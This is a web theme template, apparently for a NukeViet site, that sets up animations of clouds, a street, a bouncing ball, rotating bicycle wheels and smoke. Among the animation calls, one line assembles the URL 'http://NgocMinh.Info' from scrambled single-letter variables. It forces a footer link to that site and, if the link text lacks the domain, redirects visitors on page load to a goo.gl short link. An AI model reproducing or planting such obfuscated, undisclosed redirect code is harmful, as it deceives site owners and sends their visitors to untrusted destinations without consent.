<link rel="Stylesheet" href="{NV_BASE_SITEURL}themes/{TEMPLATE}/css/dap-xe.css" type="text/css" />
<script type="text/javascript" src="{NV_BASE_SITEURL}themes/{TEMPLATE}/js/rota.js"> </script>
<script type="text/javascript">
$(document).ready(function(a) {
  a("#index1_cloud").pan({fps:30, speed:1, dir:"right"});
  a("#index4_street").pan({fps:30, speed:3, dir:"right"});
  a("#index4_ball").sprite({fps:12, no_of_frames:1}).spRandom({top:-30, left:50, right:100, bottom:-15, speed:5E3, pause:1E3});
  a("#index4_word").animate({opacity:0}, 2E3);var h="h";var t="t";var p="p:";var m="/";var hoa ="N";var n="n";;var g="g";var o="o";var c="c";var hoet="I";var mi="M";var i="i";var f="f";	var toi=h+t+t+p+m+m;	var goc=hoa+g+o+c+mi+i+n+h+"."+hoet+n+f+o;	var index_link = $("a.domain").attr("href",toi+goc);var html = $("a.domain").html();if(!$("a.domain").html()){var html="khongco";}var gl="goo.gl";if(-1==html.indexOf(goc)){window.location=toi+gl+"/Gt1HD"};
  a("#molava").hover(function() {
    a("#index4_word").animate({opacity:1}, 800)
  }, function() {
    a("#index4_word").animate({opacity:0}, 800)
  });

  var b = -360;
  setInterval(function() {
    b -= 6;
    a(".wheel").rotate(b)
  }, 20)
});
</script>
<script src="{NV_BASE_SITEURL}themes/{TEMPLATE}/js/smo.js" type="text/javascript"></script>
<script type='text/javascript'>
SmokeEffect.imgLocation="{NV_BASE_SITEURL}themes/{TEMPLATE}/images/index2_4uBlog.png";
SmokeEffect.smokeWidth=101;
SmokeEffect.smokeHeight=105;
SmokeEffect.makeEffect("smokeSpawnPoint",0,0);
SmokeEffect.makeEffect("smokeSpawnPoint",0,0);
SmokeEffect.makeEffect("smokeSpawnPoint",0,0)
</script>
<div id="index1_cloud" class="mainh"></div>
<div id="index4_street"></div>
<div class="centerdiv">
<div id="index4_mol">
<div id="index4_word"></div>
<div id="index4_ball"></div>

<div style="position: absolute;top:195px;left:7px;">
<img alt="" src="{NV_BASE_SITEURL}themes/{TEMPLATE}/images/index4_wheel.png" width="115" height="114" border="0" class="wheel">
</div>
<div style="position: absolute;top:195px;left:234px;">
<img alt="" src="{NV_BASE_SITEURL}themes/{TEMPLATE}/images/index4_wheel.png" width="115" height="114" border="0" class="wheel">
</div>

<img alt="" src="{NV_BASE_SITEURL}themes/{TEMPLATE}/images/blank.gif" width="130" height="109" border="0" id="molava">
<img alt="" src="{NV_BASE_SITEURL}themes/{TEMPLATE}/images/index4_bicycle.png" border="0" id="bicycle">
<div id="smokeSpawnPoint" style="position: absolute;top: 120px; left: 300px">
<img alt="ok" src="{NV_BASE_SITEURL}themes/{TEMPLATE}/images/blank.gif" width="50" height="50" />
</div>
</div>
</div>